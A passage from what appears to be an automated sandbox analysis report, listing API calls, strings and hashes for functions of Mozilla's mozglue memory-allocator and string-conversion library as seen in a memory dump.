                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD751
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFBD7EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                      • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                      • API String ID: 2690322072-3894294050
                                                                                                      • Opcode ID: c6688c5a95987581c402e763dcaa147d7695c1b5e9957efe09193230a9464d27
                                                                                                      • Instruction ID: 6be51646f2be083ee14ab6d940b3ae0c7a4c6edea66f9c2cb9488da1274ea643
                                                                                                      • Opcode Fuzzy Hash: c6688c5a95987581c402e763dcaa147d7695c1b5e9957efe09193230a9464d27
                                                                                                      • Instruction Fuzzy Hash: BF91B671A047018FE718CF69C99076AB7F2FB89314F254A2ED56AD7B89D730A844CB43
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFB5E90 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 2651COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(-0000000C), ref: 6CFB5EDB
                                                                                                      • memset.VCRUNTIME140(6CFF7765,000000E5,55CCCCCC), ref: 6CFB5F27
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFB5FB2
                                                                                                      • memset.VCRUNTIME140(6CFF7765,000000E5,01C09015), ref: 6CFB61F0
                                                                                                      • VirtualFree.KERNEL32(-00000001,00100000,00004000), ref: 6CFB7652
                                                                                                      Strings
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CFB72E3
                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CFB72F8
                                                                                                      • MOZ_CRASH(), xrefs: 6CFB7BA4
                                                                                                      • MOZ_RELEASE_ASSERT(mNode), xrefs: 6CFB7BCD, 6CFB7C1F, 6CFB7C34, 6CFB80FD
                                                                                                      • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CFB730D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionmemset$EnterFreeLeaveVirtual
                                                                                                      • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 2613674957-1127040744
                                                                                                      • Opcode ID: 4b25c9919d832111fc02a64afbf0a6497a05ab14ee98dc1f012744f68af47669
                                                                                                      • Instruction ID: dba9acce70ad0a075fdd18a1d0c7d4f2abe035b9fd0bd3b1a8d168846c94c48c
                                                                                                      • Opcode Fuzzy Hash: 4b25c9919d832111fc02a64afbf0a6497a05ab14ee98dc1f012744f68af47669
                                                                                                      • Instruction Fuzzy Hash: 82338C716057018FD308CF2AC590716FBE2BF85328F29C6ADE8699B7A5D731E841CB51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF4EA0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 408sleepCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(000007D0), ref: 6CFF4EFF
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF4F2E
                                                                                                      • moz_xmalloc.MOZGLUE ref: 6CFF4F52
                                                                                                      • memset.VCRUNTIME140(00000000,00000000), ref: 6CFF4F62
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF52B2
                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CFF52E6
                                                                                                      • Sleep.KERNEL32(00000010), ref: 6CFF5481
                                                                                                      • free.MOZGLUE(?), ref: 6CFF5498
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: floor$Sleep$freememsetmoz_xmalloc
                                                                                                      • String ID: (
                                                                                                      • API String ID: 4104871533-3887548279
                                                                                                      • Opcode ID: 3dc3a6fd6e739e64acf74944c999f06774cf415c51331f0e89684ecfb97f31f4
                                                                                                      • Instruction ID: 0a05d7904329882d84d1522f077b43e64bea9d290dbe0e874014cd4e725d18e3
                                                                                                      • Opcode Fuzzy Hash: 3dc3a6fd6e739e64acf74944c999f06774cf415c51331f0e89684ecfb97f31f4
                                                                                                      • Instruction Fuzzy Hash: 4AF1D372A18B008FC716CF39C85162BBBF9AFD6384F05872EF956A7651DB31D4428B81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFB9E50 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 878COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CFB9EB8
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFB9F24
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CFB9F34
                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6CFBA823
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFBA83C
                                                                                                      • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6CFBA849
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$K@1@LeaveMaybe@_RandomUint64@mozilla@@$Entermemset
                                                                                                      • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 2950001534-1351931279
                                                                                                      • Opcode ID: be66890e3ad7b4f83b641ea4a04e0c0b73c3abba174fb995990286512078b765
                                                                                                      • Instruction ID: f5d82343fd0d8bfbe23a48f05a24e6a6f7fe88c946163da6ecb322a7ac2b8e70
                                                                                                      • Opcode Fuzzy Hash: be66890e3ad7b4f83b641ea4a04e0c0b73c3abba174fb995990286512078b765
                                                                                                      • Instruction Fuzzy Hash: 9E727D72A057118FD714CF2AC940715FBE1BF89328F2AC66DE869AB791D735E841CB80
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFE2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CFE2C31
                                                                                                      • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CFE2C61
                                                                                                        • Part of subcall function 6CF94DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CF94E5A
                                                                                                        • Part of subcall function 6CF94DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CF94E97
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CFE2C82
                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CFE2E2D
                                                                                                        • Part of subcall function 6CFA81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6CFA81DE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                      • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                      • API String ID: 801438305-4149320968
                                                                                                      • Opcode ID: 0eb0b751a21d772b4294ccf64d919b651c209631d38af36403057eb4013d017e
                                                                                                      • Instruction ID: 5e307184f90a82eadbb86efaa2e7bcbaa61da1d49463b11fd31c53f63e8557e7
                                                                                                      • Opcode Fuzzy Hash: 0eb0b751a21d772b4294ccf64d919b651c209631d38af36403057eb4013d017e
                                                                                                      • Instruction Fuzzy Hash: 1791AE70608782AFD724CF28C48469FBBE5AFC9258F10491DE59A87761EB30D949CB53
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF9E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv__aullrem
                                                                                                      • String ID: -Infinity$NaN
                                                                                                      • API String ID: 3839614884-2141177498
                                                                                                      • Opcode ID: 1062c20e6dec5fd0cc5eec4377493482bb6ac4d3bde85c67435244e115608d7a
                                                                                                      • Instruction ID: 39086e6b511cc2ebf58d10577f97512da50d06c567b1ddf9d1c5b471d8fec983
                                                                                                      • Opcode Fuzzy Hash: 1062c20e6dec5fd0cc5eec4377493482bb6ac4d3bde85c67435244e115608d7a
                                                                                                      • Instruction Fuzzy Hash: 49C1BD31F043198BEB14CFA8C8907DEB7B6EF84704F154529D426ABB90DB71A94ACB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF9D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $-$0$0$1$8$9$@
                                                                                                      • API String ID: 0-3654031807
                                                                                                      • Opcode ID: 7b8dbc240fb85a5ba52f9fd55ed595901d0d630a78896766a83e2113b57754f4
                                                                                                      • Instruction ID: abe827627dbc0af84cef3d061db559c2bde1eb185a7d9a05b933642633e88f9f
                                                                                                      • Opcode Fuzzy Hash: 7b8dbc240fb85a5ba52f9fd55ed595901d0d630a78896766a83e2113b57754f4
                                                                                                      • Instruction Fuzzy Hash: B3629B7160C3458FFF15CE29C09076ABBF2AF86358F384A1DE4E54BA91C3359985CB82
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CF9BEF0 Relevance: 8.2, APIs: 5, Instructions: 652COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv$__aullrem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2022606265-0
                                                                                                      • Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                      • Instruction ID: 7932248c1cdf2b18f43e3215828616b507278a076583a7eb36cc8a009dc56620
                                                                                                      • Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                                                      • Instruction Fuzzy Hash: E5322732B046118FDB18DE2CC890A56BBE6AFC9310F09866DE599CB3E5D730ED05CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6D00545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6D008A4B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2221118986-0
                                                                                                      • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                      • Instruction ID: 1b5adb790f0b8cf37cf34b93fb4d63ae30c5b7fc5acf6f900b4a9b907bba9ce9
                                                                                                      • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                      • Instruction Fuzzy Hash: DDB1D676A0421A8FEB14CF68CC91BADB7B6FF85314F1942A9C549DB381D7309985CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6D00542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6D0088F0
                                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6D00925C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2221118986-0
                                                                                                      • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                      • Instruction ID: 1f21a6db31266341dd0e28e5e1edf9e54676d4869dea28d6463bc0d6aa51ed33
                                                                                                      • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                      • Instruction Fuzzy Hash: F6B1B576E0420ADFEB14CE68C8817ADB7B6FF85314F194279C549DB385D730A989CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD6CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6CFD6D45
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CFD6E1E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                      • String ID:
                                                                                                      • API String ID: 4169067295-0
                                                                                                      • Opcode ID: f1f5f1d36176b52faf12b283d8686b50e86b96f3365fc065f59e542457b6ef5c
                                                                                                      • Instruction ID: 522fd77148ad45c2ce48c00bb9e4b8db3f55e7ba70d36f6682aafbb555e6a144
                                                                                                      • Opcode Fuzzy Hash: f1f5f1d36176b52faf12b283d8686b50e86b96f3365fc065f59e542457b6ef5c
                                                                                                      • Instruction Fuzzy Hash: E6A18C746187819FD715CF25C490BAEFBE2BF89308F05495DE88A87751DB70B848CB92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFB4640 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1251memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6CFB4777
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                      • API String ID: 4275171209-1351931279
                                                                                                      • Opcode ID: c71b26f2063b3bb9f7070649059d44874eae71bcbf67e7a0081828df42c4f7fe
                                                                                                      • Instruction ID: 8926bd97522b5c023bd34cc5195479b054898d91bd947ff5f0d16bf6ef0b4b17
                                                                                                      • Opcode Fuzzy Hash: c71b26f2063b3bb9f7070649059d44874eae71bcbf67e7a0081828df42c4f7fe
                                                                                                      • Instruction Fuzzy Hash: 13B28E72A056018FD708CF1AC690716FBE2BFC5328B29C76DE4699B7A5D735E841CB80
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFF85F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv
                                                                                                      • String ID:
                                                                                                      • API String ID: 3732870572-0
                                                                                                      • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                      • Instruction ID: 6cbd216a35abccdfca8385db586cdb4693a05ebdcb19eb7a66821e500912cdb3
                                                                                                      • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                      • Instruction Fuzzy Hash: 8E329031F001198BDF18CE9DC8A17AEF7B2FB89300F15853AD516BB7A0DA349D468B91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFD5C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • memcmp.VCRUNTIME140(?,?,6CFA4A63,?,?), ref: 6CFD5F06
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 1475443563-0
                                                                                                      • Opcode ID: 9d0380b1cf9dd1fcef092cd6ad8ee57fc4d9e4e618beb220335e8292e6bc2514
                                                                                                      • Instruction ID: 48b8751f1f83078bfa4651c968e7e9d260a033028d4ec144cd2786f34742cec6
                                                                                                      • Opcode Fuzzy Hash: 9d0380b1cf9dd1fcef092cd6ad8ee57fc4d9e4e618beb220335e8292e6bc2514
                                                                                                      • Instruction Fuzzy Hash: 0DC1B1B5E052098BCB04CFA9C5906EEBBB2FF8A318F29415DD8556BB45D732B805CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 6CFC0512 Relevance: .5, Instructions: 466COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                      • Instruction ID: 3f515f72efde25111b6b6adfddae459fc5b87277f88a2376d821dd9975950375
